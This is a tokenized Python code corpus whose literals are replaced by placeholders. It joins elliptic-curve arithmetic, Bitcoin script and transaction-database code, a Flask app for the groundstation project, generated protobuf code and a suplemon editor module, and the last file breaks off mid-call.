<s> from . import numbertheory <EOL> try : <EOL> from . native . library import NATIVE_LIBRARY <EOL> except ImportError : <EOL> NATIVE_LIBRARY = None <EOL> class NoSuchPointError ( ValueError ) : pass <EOL> class CurveFp ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , p , a , b ) : <EOL> """<STR_LIT>""" <EOL> self . __p = p <EOL> self . __a = a <EOL> self . __b = b <EOL> def p ( self ) : <EOL> return self . __p <EOL> def a ( self ) : <EOL> return self . __a <EOL> def b ( self ) : <EOL> return self . __b <EOL> def contains_point ( self , x , y ) : <EOL> """<STR_LIT>""" <EOL> return ( y * y - ( x * x * x + self . __a * x + self . __b ) ) % self . __p == <NUM_LIT:0> <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . __class__ . __name__ , self . __p , self . __a , self . __b ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . __a , self . __b , self . __p ) <EOL> class Point ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , curve , x , y , order = None ) : <EOL> """<STR_LIT>""" <EOL> self . __curve = curve <EOL> self . __x = x <EOL> self . __y = y <EOL> self . __order = order <EOL> if self . __curve and not self . __curve . contains_point ( x , y ) : <EOL> raise NoSuchPointError ( '<STR_LIT>' . format ( x , y , curve ) ) <EOL> if order : assert self * order == INFINITY <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self . __curve == other . __curve and self . __x == other . __x and self . __y == other . __y : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def __add__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other == INFINITY : return self <EOL> if self == INFINITY : return other <EOL> assert self . __curve == other . __curve <EOL> if self . __x == other . __x : <EOL> if ( self . __y + other . __y ) % self . __curve . p ( ) == <NUM_LIT:0> : <EOL> return INFINITY <EOL> else : <EOL> return self . double ( ) <EOL> p = self . __curve . 
p ( ) <EOL> l = ( ( other . __y - self . __y ) * numbertheory . inverse_mod ( other . __x - self . __x , p ) ) % p <EOL> x3 = ( l * l - self . __x - other . __x ) % p <EOL> y3 = ( l * ( self . __x - x3 ) - self . __y ) % p <EOL> return Point ( self . __curve , x3 , y3 ) <EOL> def __mul__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> def leftmost_bit ( x ) : <EOL> assert x > <NUM_LIT:0> <EOL> result = <NUM_LIT:1> <EOL> while result <= x : result = <NUM_LIT:2> * result <EOL> return result // <NUM_LIT:2> <EOL> e = other <EOL> if self . __order : e = e % self . __order <EOL> if e == <NUM_LIT:0> : return INFINITY <EOL> if self == INFINITY : return INFINITY <EOL> assert e > <NUM_LIT:0> <EOL> if NATIVE_LIBRARY : <EOL> return NATIVE_LIBRARY . fast_mul ( self , other ) <EOL> e3 = <NUM_LIT:3> * e <EOL> negative_self = Point ( self . __curve , self . __x , - self . __y , self . __order ) <EOL> i = leftmost_bit ( e3 ) // <NUM_LIT:2> <EOL> result = self <EOL> while i > <NUM_LIT:1> : <EOL> result = result . double ( ) <EOL> if ( e3 & i ) != <NUM_LIT:0> and ( e & i ) == <NUM_LIT:0> : result = result + self <EOL> if ( e3 & i ) == <NUM_LIT:0> and ( e & i ) != <NUM_LIT:0> : result = result + negative_self <EOL> i = i // <NUM_LIT:2> <EOL> return result <EOL> def __rmul__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self * other <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . __class__ . __name__ , self . __curve , self . __x , self . __y , self . __order ) <EOL> def __str__ ( self ) : <EOL> if self == INFINITY : return "<STR_LIT>" <EOL> return "<STR_LIT>" % ( self . __x , self . __y ) <EOL> def double ( self ) : <EOL> """<STR_LIT>""" <EOL> if self == INFINITY : <EOL> return INFINITY <EOL> p = self . __curve . p ( ) <EOL> a = self . __curve . a ( ) <EOL> l = ( ( <NUM_LIT:3> * self . __x * self . __x + a ) * numbertheory . inverse_mod ( <NUM_LIT:2> * self . __y , p ) ) % p <EOL> x3 = ( l * l - <NUM_LIT:2> * self . __x ) % p <EOL> y3 = ( l * ( self . 
__x - x3 ) - self . __y ) % p <EOL> return Point ( self . __curve , x3 , y3 ) <EOL> def x ( self ) : <EOL> return self . __x <EOL> def y ( self ) : <EOL> return self . __y <EOL> def pair ( self ) : <EOL> return ( self . __x , self . __y ) <EOL> def curve ( self ) : <EOL> return self . __curve <EOL> def order ( self ) : <EOL> return self . __order <EOL> INFINITY = Point ( None , None , None ) <EOL> def __main__ ( ) : <EOL> class FailedTest ( Exception ) : pass <EOL> def test_add ( c , x1 , y1 , x2 , y2 , x3 , y3 ) : <EOL> """<STR_LIT>""" <EOL> p1 = Point ( c , x1 , y1 ) <EOL> p2 = Point ( c , x2 , y2 ) <EOL> p3 = p1 + p2 <EOL> print ( "<STR_LIT>" % ( p1 , p2 , p3 ) ) <EOL> if p3 . x ( ) != x3 or p3 . y ( ) != y3 : <EOL> raise FailedTest ( "<STR_LIT>" % ( x3 , y3 ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def test_double ( c , x1 , y1 , x3 , y3 ) : <EOL> """<STR_LIT>""" <EOL> p1 = Point ( c , x1 , y1 ) <EOL> p3 = p1 . double ( ) <EOL> print ( "<STR_LIT>" % ( p1 , p3 ) ) <EOL> if p3 . x ( ) != x3 or p3 . y ( ) != y3 : <EOL> raise FailedTest ( "<STR_LIT>" % ( x3 , y3 ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def test_double_infinity ( c ) : <EOL> """<STR_LIT>""" <EOL> p1 = INFINITY <EOL> p3 = p1 . double ( ) <EOL> print ( "<STR_LIT>" % ( p1 , p3 ) ) <EOL> if p3 . x ( ) != INFINITY . x ( ) or p3 . y ( ) != INFINITY . y ( ) : <EOL> raise FailedTest ( "<STR_LIT>" % ( INFINITY . x ( ) , INFINITY . y ( ) ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def test_multiply ( c , x1 , y1 , m , x3 , y3 ) : <EOL> """<STR_LIT>""" <EOL> p1 = Point ( c , x1 , y1 ) <EOL> p3 = p1 * m <EOL> print ( "<STR_LIT>" % ( p1 , m , p3 ) ) <EOL> if p3 . x ( ) != x3 or p3 . 
y ( ) != y3 : <EOL> raise FailedTest ( "<STR_LIT>" % ( x3 , y3 ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> c = CurveFp ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> test_add ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:20> ) <EOL> test_double ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:7> , <NUM_LIT:12> ) <EOL> test_add ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:7> , <NUM_LIT:12> ) <EOL> test_multiply ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:12> ) <EOL> test_double_infinity ( c ) <EOL> g = Point ( c , <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:7> ) <EOL> check = INFINITY <EOL> for i in range ( <NUM_LIT:7> + <NUM_LIT:1> ) : <EOL> p = ( i % <NUM_LIT:7> ) * g <EOL> print ( "<STR_LIT>" % ( g , i , p , check ) ) <EOL> if p == check : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> check = check + g <EOL> p = <NUM_LIT> <EOL> r = <NUM_LIT> <EOL> c = <NUM_LIT> <EOL> b = <NUM_LIT> <EOL> Gx = <NUM_LIT> <EOL> Gy = <NUM_LIT> <EOL> c192 = CurveFp ( p , - <NUM_LIT:3> , b ) <EOL> p192 = Point ( c192 , Gx , Gy , r ) <EOL> d = <NUM_LIT> <EOL> Q = d * p192 <EOL> if Q . x ( ) != <NUM_LIT> : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> k = <NUM_LIT> <EOL> R = k * p192 <EOL> if R . x ( ) != <NUM_LIT> or R . y ( ) != <NUM_LIT> : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> u1 = <NUM_LIT> <EOL> u2 = <NUM_LIT> <EOL> temp = u1 * p192 + u2 * Q <EOL> if temp . x ( ) != <NUM_LIT> or temp . y ( ) != <NUM_LIT> : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> __main__ ( ) </s>
<s> def main ( ) : <EOL> print ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import collections <EOL> from pycoin import ecdsa <EOL> from . . script import der , opcodes , tools <EOL> bytes_from_int = chr if bytes == str else lambda x : bytes ( [ x ] ) <EOL> def generate_default_placeholder_signature ( ) : <EOL> order = ecdsa . generator_secp256k1 . order ( ) <EOL> r , s = order - <NUM_LIT:1> , order // <NUM_LIT:2> <EOL> return der . sigencode_der ( r , s ) + bytes_from_int ( <NUM_LIT:1> ) <EOL> DEFAULT_PLACEHOLDER_SIGNATURE = generate_default_placeholder_signature ( ) <EOL> class ScriptType ( object ) : <EOL> def __init__ ( self ) : <EOL> raise NotImplemented ( ) <EOL> @ classmethod <EOL> def subclasses ( cls , skip_self = True ) : <EOL> for c in cls . __subclasses__ ( ) : <EOL> for c1 in c . subclasses ( skip_self = False ) : <EOL> yield c1 <EOL> if not skip_self : <EOL> yield cls <EOL> @ classmethod <EOL> def from_address ( cls , text , netcodes = None ) : <EOL> for sc in cls . subclasses ( ) : <EOL> try : <EOL> st = sc . from_address ( text , netcodes = netcodes ) <EOL> return st <EOL> except Exception : <EOL> pass <EOL> @ classmethod <EOL> def from_script ( cls , script , netcode = "<STR_LIT>" ) : <EOL> for sc in cls . subclasses ( ) : <EOL> try : <EOL> st = sc . from_script ( script ) <EOL> return st <EOL> except Exception : <EOL> pass <EOL> @ classmethod <EOL> def match ( cls , script ) : <EOL> template = cls . TEMPLATE <EOL> r = collections . defaultdict ( list ) <EOL> pc1 = pc2 = <NUM_LIT:0> <EOL> while <NUM_LIT:1> : <EOL> if pc1 == len ( script ) and pc2 == len ( template ) : <EOL> return r <EOL> if pc1 >= len ( script ) or pc2 >= len ( template ) : <EOL> break <EOL> opcode1 , data1 , pc1 = tools . get_opcode ( script , pc1 ) <EOL> opcode2 , data2 , pc2 = tools . get_opcode ( template , pc2 ) <EOL> l1 = <NUM_LIT:0> if data1 is None else len ( data1 ) <EOL> if opcode2 == opcodes . OP_PUBKEY : <EOL> if l1 < <NUM_LIT> or l1 > <NUM_LIT> : <EOL> break <EOL> r [ "<STR_LIT>" ] . append ( data1 ) <EOL> elif opcode2 == opcodes . 
OP_PUBKEYHASH : <EOL> if l1 != <NUM_LIT> / <NUM_LIT:8> : <EOL> break <EOL> r [ "<STR_LIT>" ] . append ( data1 ) <EOL> elif opcode2 == opcodes . OP_NULLDATA : <EOL> if not ( <NUM_LIT:0> < l1 <= <NUM_LIT> ) : <EOL> break <EOL> r [ "<STR_LIT>" ] . append ( data1 ) <EOL> elif ( opcode1 , data1 ) != ( opcode2 , data2 ) : <EOL> break <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _create_script_signature ( self , secret_exponent , sign_value , signature_type ) : <EOL> order = ecdsa . generator_secp256k1 . order ( ) <EOL> r , s = ecdsa . sign ( ecdsa . generator_secp256k1 , secret_exponent , sign_value ) <EOL> if s + s > order : <EOL> s = order - s <EOL> return der . sigencode_der ( r , s ) + bytes_from_int ( signature_type ) <EOL> def address ( self , netcode = '<STR_LIT>' ) : <EOL> return self . info ( ) [ "<STR_LIT:address>" ] <EOL> def solve ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( ) </s>
<s> import os <EOL> import json <EOL> import time <EOL> from flask import Flask , render_template , request <EOL> from groundstation import logger <EOL> log = logger . getLogger ( __name__ ) <EOL> from groundstation . protocols . github . read_adaptor import GithubReadAdaptor <EOL> from groundstation . gref import Gref , Tip <EOL> import pygit2 <EOL> from groundstation . utils import oid2hex <EOL> from groundstation . objects . root_object import RootObject <EOL> from groundstation . objects . update_object import UpdateObject <EOL> def jsonate ( obj , escaped ) : <EOL> jsonbody = json . dumps ( obj ) <EOL> if escaped : <EOL> jsonbody = jsonbody . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> return jsonbody <EOL> def channels_json ( station , escaped = False ) : <EOL> channels = [ { "<STR_LIT:name>" : channel } for channel in station . channels ( ) ] <EOL> return jsonate ( channels , escaped ) <EOL> def grefs_json ( station , channel , escaped = False ) : <EOL> grefs = [ gref . as_dict ( ) for gref in station . grefs ( channel ) ] <EOL> return jsonate ( grefs , escaped ) <EOL> def make_airship ( station ) : <EOL> app = Flask ( __name__ ) <EOL> app . has_signing_key = False <EOL> def set_signing_key ( self , keyname ) : <EOL> app . has_signing_key = True <EOL> self . private_crypto_adaptor = station . get_private_crypto_adaptor ( keyname ) <EOL> app . set_signing_key = lambda key : set_signing_key ( app , key ) <EOL> def _update_gref ( gref , tips , parents ) : <EOL> if app . has_signing_key : <EOL> tips = map ( lambda tip : Tip ( tip . tip , app . private_crypto_adaptor . sign ( tip . tip ) ) , tips ) <EOL> station . update_gref ( gref , tips , parents ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> return render_template ( "<STR_LIT>" , <EOL> channels_json = channels_json ( station , True ) , <EOL> current_time = time . time ( ) ) <EOL> @ app . 
route ( "<STR_LIT>" ) <EOL> def list_channels ( ) : <EOL> return channels_json ( station ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT>' ] ) <EOL> def new_channel ( ) : <EOL> channel = request . form . keys ( ) [ <NUM_LIT:0> ] <EOL> station . create_channel ( channel ) <EOL> return "<STR_LIT>" <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def list_grefs ( channel ) : <EOL> return grefs_json ( station , channel ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def fetch_gref ( channel , identifier ) : <EOL> crypto_adaptor = station . get_crypto_adaptor ( ) <EOL> adaptor = GithubReadAdaptor ( station , channel ) <EOL> gref = Gref ( station . store , channel , identifier ) <EOL> log . info ( "<STR_LIT>" % <EOL> ( channel , identifier ) ) <EOL> marshalled_thread = adaptor . get_issue ( gref , crypto_adaptor = crypto_adaptor ) <EOL> root_obj = marshalled_thread [ "<STR_LIT>" ] . pop ( ) <EOL> root = root_obj . as_json ( ) <EOL> root [ "<STR_LIT>" ] = oid2hex ( pygit2 . hash ( root_obj . as_object ( ) ) ) <EOL> response = [ ] <EOL> while marshalled_thread [ "<STR_LIT>" ] : <EOL> node = marshalled_thread [ "<STR_LIT>" ] . pop ( ) <EOL> data = json . loads ( node . data ) <EOL> data [ "<STR_LIT>" ] = list ( node . parents ) <EOL> data [ "<STR_LIT>" ] = oid2hex ( pygit2 . hash ( node . as_object ( ) ) ) <EOL> response . append ( data ) <EOL> return jsonate ( { "<STR_LIT:content>" : response , <EOL> "<STR_LIT:root>" : root , <EOL> "<STR_LIT>" : marshalled_thread [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : marshalled_thread [ "<STR_LIT>" ] } , False ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT:POST>' ] ) <EOL> def update_gref ( channel , identifier ) : <EOL> gref = Gref ( station . store , channel , identifier ) <EOL> user = request . form [ "<STR_LIT:user>" ] <EOL> body = request . form [ "<STR_LIT:body>" ] <EOL> parents = map ( str , json . loads ( request . 
form [ "<STR_LIT>" ] ) ) <EOL> payload = { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:id>" : None , <EOL> "<STR_LIT:body>" : body , <EOL> "<STR_LIT:user>" : user <EOL> } <EOL> update_object = UpdateObject ( parents , json . dumps ( payload ) ) <EOL> oid = station . write ( update_object . as_object ( ) ) <EOL> _update_gref ( gref , [ Tip ( oid , "<STR_LIT>" ) ] , parents ) <EOL> return jsonate ( { "<STR_LIT>" : "<STR_LIT>" } , False ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT>' ] ) <EOL> def create_gref ( channel ) : <EOL> def _write_object ( obj ) : <EOL> return station . write ( obj . as_object ( ) ) <EOL> name = request . form [ "<STR_LIT:name>" ] <EOL> protocol = request . form [ "<STR_LIT>" ] <EOL> user = request . form [ "<STR_LIT:user>" ] <EOL> body = request . form [ "<STR_LIT:body>" ] <EOL> title = request . form [ "<STR_LIT:title>" ] <EOL> gref = Gref ( station . store , channel , name ) <EOL> root = RootObject ( name , channel , protocol ) <EOL> root_oid = _write_object ( root ) <EOL> _title = UpdateObject ( [ root_oid ] , json . dumps ( { <EOL> "<STR_LIT:type>" : "<STR_LIT:title>" , <EOL> "<STR_LIT:id>" : None , <EOL> "<STR_LIT:body>" : title , <EOL> "<STR_LIT:user>" : user <EOL> } ) ) <EOL> title_oid = _write_object ( _title ) <EOL> _body = UpdateObject ( [ title_oid ] , json . dumps ( { <EOL> "<STR_LIT:type>" : "<STR_LIT:body>" , <EOL> "<STR_LIT:id>" : None , <EOL> "<STR_LIT:body>" : body <EOL> } ) ) <EOL> body_oid = _write_object ( _body ) <EOL> _update_gref ( gref , [ Tip ( body_oid , "<STR_LIT>" ) ] , [ ] ) <EOL> return "<STR_LIT>" <EOL> return app </s>
<s> from google . protobuf import descriptor as _descriptor <EOL> from google . protobuf import message as _message <EOL> from google . protobuf import reflection as _reflection <EOL> from google . protobuf import descriptor_pb2 <EOL> import groundstation . objects . base_object_pb2 <EOL> DESCRIPTOR = _descriptor . FileDescriptor ( <EOL> name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> serialized_pb = '<STR_LIT>' ) <EOL> _UPDATEOBJECT = _descriptor . Descriptor ( <EOL> name = '<STR_LIT>' , <EOL> full_name = '<STR_LIT>' , <EOL> filename = None , <EOL> file = DESCRIPTOR , <EOL> containing_type = None , <EOL> fields = [ <EOL> _descriptor . FieldDescriptor ( <EOL> name = '<STR_LIT>' , full_name = '<STR_LIT>' , index = <NUM_LIT:0> , <EOL> number = <NUM_LIT:1> , type = <NUM_LIT:12> , cpp_type = <NUM_LIT:9> , label = <NUM_LIT:3> , <EOL> has_default_value = False , default_value = [ ] , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> _descriptor . FieldDescriptor ( <EOL> name = '<STR_LIT:data>' , full_name = '<STR_LIT>' , index = <NUM_LIT:1> , <EOL> number = <NUM_LIT:2> , type = <NUM_LIT:12> , cpp_type = <NUM_LIT:9> , label = <NUM_LIT:2> , <EOL> has_default_value = False , default_value = "<STR_LIT>" , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> _descriptor . 
FieldDescriptor ( <EOL> name = '<STR_LIT:type>' , full_name = '<STR_LIT>' , index = <NUM_LIT:2> , <EOL> number = <NUM_LIT:15> , type = <NUM_LIT> , cpp_type = <NUM_LIT:8> , label = <NUM_LIT:1> , <EOL> has_default_value = True , default_value = <NUM_LIT:2> , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> ] , <EOL> extensions = [ <EOL> ] , <EOL> nested_types = [ ] , <EOL> enum_types = [ <EOL> ] , <EOL> options = None , <EOL> is_extendable = False , <EOL> extension_ranges = [ ] , <EOL> serialized_start = <NUM_LIT> , <EOL> serialized_end = <NUM_LIT> , <EOL> ) <EOL> _UPDATEOBJECT . fields_by_name [ '<STR_LIT:type>' ] . enum_type = groundstation . objects . base_object_pb2 . _GIZMOTYPE <EOL> DESCRIPTOR . message_types_by_name [ '<STR_LIT>' ] = _UPDATEOBJECT <EOL> class UpdateObject ( _message . Message ) : <EOL> __metaclass__ = _reflection . GeneratedProtocolMessageType <EOL> DESCRIPTOR = _UPDATEOBJECT </s>
<s> import groundstation . proto . object_list_pb2 <EOL> from groundstation import logger <EOL> log = logger . getLogger ( __name__ ) <EOL> def handle_newobject ( self ) : <EOL> obj = self . payload <EOL> if obj not in self . station : <EOL> request = self . _Request ( "<STR_LIT>" , payload = obj ) <EOL> self . stream . enqueue ( request ) </s>
<s> from . cli import main <EOL> main ( ) </s>
<s> from suplemon import helpers <EOL> from suplemon . suplemon_module import Module <EOL> class Comment ( Module ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , app , editor , args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> comment = editor . syntax . get_comment ( ) <EOL> except : <EOL> return False <EOL> line_nums = editor . get_lines_with_cursors ( ) <EOL> for lnum in line_nums : <EOL> line = editor . lines [ lnum ] <EOL> if not len ( line ) : <EOL> continue <EOL> target = str ( line ) . strip ( ) <EOL> w = helpers . whitespace ( line ) <EOL> if helpers . starts ( target , comment [ <NUM_LIT:0> ] ) : <EOL> new_line = ( "<STR_LIT:U+0020>" * w ) + line [ w + len ( comment [ <NUM_LIT:0> ] ) : ] <EOL> if comment [ <NUM_LIT:1> ] : <EOL> if helpers . ends ( new_line , comment [ <NUM_LIT:1> ] ) : <EOL> new_line = new_line [ : - <NUM_LIT:1> * len ( comment [ <NUM_LIT:1> ] ) ] <EOL> editor . lines [ lnum ] . set_data ( new_line ) <EOL> else : <EOL> new_line = line [ w : ] <EOL> new_line = ( "<STR_LIT:U+0020>" * w ) + comment [ <NUM_LIT:0> ] + new_line <EOL> if comment [ <NUM_LIT:1> ] : <EOL> new_line += comment [ <NUM_LIT:1> ] <EOL> editor . lines [ lnum ] . set_data ( new_line ) <EOL> editor . move_cursors ( ) <EOL> editor . store_action_state ( "<STR_LIT>" ) <EOL> module = { <EOL> "<STR_LIT:class>" : Comment , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> } </s>
<s> import os <EOL> import random <EOL> import sqlite3 <EOL> import struct <EOL> from . import database <EOL> from . import keys <EOL> from . . import coins <EOL> from . . import protocol <EOL> from . . import script <EOL> from . . import util <EOL> __all__ = [ '<STR_LIT>' ] <EOL> def get_q ( txid ) : <EOL> '<STR_LIT>' <EOL> return struct . unpack ( '<STR_LIT>' , txid [ : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> _KEY_DUP = '<STR_LIT>' <EOL> _0 = chr ( <NUM_LIT:0> ) * <NUM_LIT:32> <EOL> class Transaction ( object ) : <EOL> def __init__ ( self , database , row , _transaction = None ) : <EOL> keys = [ n for ( n , t , i ) in database . Columns ] <EOL> self . _database = database <EOL> self . _data = dict ( zip ( keys , row ) ) <EOL> self . _po_cache = dict ( ) <EOL> self . _transaction = _transaction <EOL> version = property ( lambda s : s . txn . version ) <EOL> inputs = property ( lambda s : s . txn . tx_in ) <EOL> outputs = property ( lambda s : s . txn . tx_out ) <EOL> lock_time = property ( lambda s : s . txn . lock_time ) <EOL> hash = property ( lambda s : s . txn . hash ) <EOL> index = property ( lambda s : keys . get_txck_index ( s . _txck ) ) <EOL> def __getstate__ ( self ) : <EOL> return ( self . _po_cache , dict ( txn = str ( self . _data [ '<STR_LIT>' ] ) , txck = self . _data [ '<STR_LIT>' ] ) ) <EOL> def __setstate__ ( self , state ) : <EOL> self . _database = None <EOL> ( self . _po_cache , self . _data ) = state <EOL> self . _transaction = None <EOL> def cache_previous_outputs ( self ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( self . inputs ) ) : <EOL> self . previous_transaction ( i ) <EOL> def previous_transaction ( self , index ) : <EOL> "<STR_LIT>" <EOL> if self . index == <NUM_LIT:0> and index == <NUM_LIT:0> : <EOL> return None <EOL> if index not in self . _po_cache : <EOL> po_hash = self . inputs [ index ] . previous_output . hash <EOL> previous_txn = self . _database . 
get ( po_hash ) <EOL> if previous_txn is None : <EOL> raise KeyError ( '<STR_LIT>' % po_hash ) <EOL> self . _po_cache [ index ] = previous_txn <EOL> return self . _po_cache [ index ] <EOL> def previous_output ( self , index ) : <EOL> '<STR_LIT>' <EOL> previous_txn = self . previous_transaction ( index ) <EOL> if previous_txn is None : return None <EOL> po = self . inputs [ index ] . previous_output <EOL> return previous_txn . outputs [ po . index ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % self . hash . encode ( '<STR_LIT>' ) <EOL> _txck = property ( lambda s : s . _data [ '<STR_LIT>' ] ) <EOL> _blockid = property ( lambda s : keys . get_txck_blockid ( s . _txck ) ) <EOL> def _previous_uock ( self , index ) : <EOL> previous_txn = self . previous_transaction ( index ) <EOL> if previous_txn is None : return None <EOL> po = self . inputs [ index ] . previous_output <EOL> return keys . get_uock ( previous_txn . _txck , po . index ) <EOL> @ property <EOL> def txn ( self ) : <EOL> '<STR_LIT>' <EOL> if self . _transaction is None : <EOL> ( vl , self . _transaction ) = protocol . Txn . parse ( self . txn_binary ) <EOL> return self . _transaction <EOL> txn_binary = property ( lambda s : str ( s . _data [ '<STR_LIT>' ] ) ) <EOL> class Database ( database . Database ) : <EOL> MINIMUM_N = <NUM_LIT:4> <EOL> TARGET_SIZE = ( <NUM_LIT:1> << <NUM_LIT:30> ) * <NUM_LIT:7> // <NUM_LIT:4> <EOL> Columns = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , False ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , False ) , <EOL> ] <EOL> Name = '<STR_LIT>' <EOL> def __init__ ( self , data_dir = None , coin = coins . Bitcoin ) : <EOL> database . Database . __init__ ( self , data_dir , coin ) <EOL> self . _connections = dict ( ) <EOL> self . _N = self . load_n ( ) <EOL> n = self . _N <EOL> while n >= self . MINIMUM_N : <EOL> self . 
get_connection ( n , <NUM_LIT:0> , True ) <EOL> n //= <NUM_LIT:2> <EOL> def load_n ( self ) : <EOL> '<STR_LIT>' <EOL> n = self . MINIMUM_N <EOL> while True : <EOL> if not os . path . isfile ( self . get_filename ( self . get_suffix ( n * <NUM_LIT:2> , <NUM_LIT:0> ) ) ) : <EOL> break <EOL> n *= <NUM_LIT:2> <EOL> return n <EOL> def get_suffix ( self , n , q ) : <EOL> return '<STR_LIT>' % ( n , q % n ) <EOL> def get_connection ( self , n , q , allow_create = False ) : <EOL> '''<STR_LIT>''' <EOL> loc = ( n , q % n ) <EOL> if loc not in self . _connections : <EOL> locs = [ ( n , i ) for i in xrange ( <NUM_LIT:0> , n ) ] <EOL> if not os . path . isfile ( self . get_filename ( self . get_suffix ( n , <NUM_LIT:0> ) ) ) : <EOL> if not allow_create : return None <EOL> locs . reverse ( ) <EOL> for l in locs : <EOL> suffix = self . get_suffix ( l [ <NUM_LIT:0> ] , l [ <NUM_LIT:1> ] ) <EOL> self . _connections [ l ] = database . Database . get_connection ( self , suffix ) <EOL> return self . _connections [ loc ] <EOL> def check_size ( self ) : <EOL> '<STR_LIT>' <EOL> suffix = self . get_suffix ( self . _N , random . randint ( <NUM_LIT:0> , self . _N - <NUM_LIT:1> ) ) <EOL> filename = self . get_filename ( suffix ) <EOL> if os . path . getsize ( filename ) > self . TARGET_SIZE : <EOL> self . _N *= <NUM_LIT:2> <EOL> self . get_connection ( self . _N , <NUM_LIT:0> , True ) <EOL> def add ( self , block , transactions ) : <EOL> '<STR_LIT>' <EOL> self . check_size ( ) <EOL> block . _check_merkle_root ( util . get_merkle_root ( transactions ) ) <EOL> connections = dict ( ) <EOL> block_txns = [ ] <EOL> for ( txn_index , txn ) in enumerate ( transactions ) : <EOL> txid = txn . hash <EOL> q = get_q ( txid ) <EOL> connection = self . get_connection ( self . _N , q ) <EOL> connections [ ( self . _N , q % self . _N ) ] = connection <EOL> cursor = connection . cursor ( ) <EOL> txck = keys . get_txck ( block . _blockid , txn_index ) <EOL> row = ( txck , keys . 
get_hint ( txid ) , buffer ( txn . binary ( ) ) ) <EOL> try : <EOL> cursor . execute ( self . sql_insert , row ) <EOL> except sqlite3 . IntegrityError , e : <EOL> if e . message != _KEY_DUP : <EOL> raise e <EOL> block_txns . append ( Transaction ( self , row , txn ) ) <EOL> for connection in connections . values ( ) : <EOL> connection . commit ( ) <EOL> block . _update_transactions ( block_txns ) <EOL> return block <EOL> def _get ( self , txck ) : <EOL> '<STR_LIT>' <EOL> for connection in self . _connections . values ( ) : <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( self . sql_select + '<STR_LIT>' , ( txck , ) ) <EOL> row = cursor . fetchone ( ) <EOL> if row : <EOL> return Transaction ( self , row ) <EOL> return None <EOL> def _get_transactions ( self , blockid ) : <EOL> "<STR_LIT>" <EOL> lo = keys . get_txck ( blockid , <NUM_LIT:0> ) <EOL> hi = keys . get_txck ( blockid + <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> txns = [ ] <EOL> for connection in self . _connections . values ( ) : <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( self . sql_select + '<STR_LIT>' , ( lo , hi ) ) <EOL> txns . extend ( ( r [ <NUM_LIT:0> ] , r ) for r in cursor . fetchall ( ) ) <EOL> txns . sort ( ) <EOL> return [ Transaction ( self , row ) for ( txck , row ) in txns ] <EOL> def get ( self , txid , default = None ) : <EOL> '<STR_LIT>' <EOL> txid_hint = keys . get_hint ( txid ) <EOL> n = self . _N <EOL> q = get_q ( txid ) <EOL> while n >= self . MINIMUM_N : <EOL> connection = self . get_connection ( n , q ) <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( 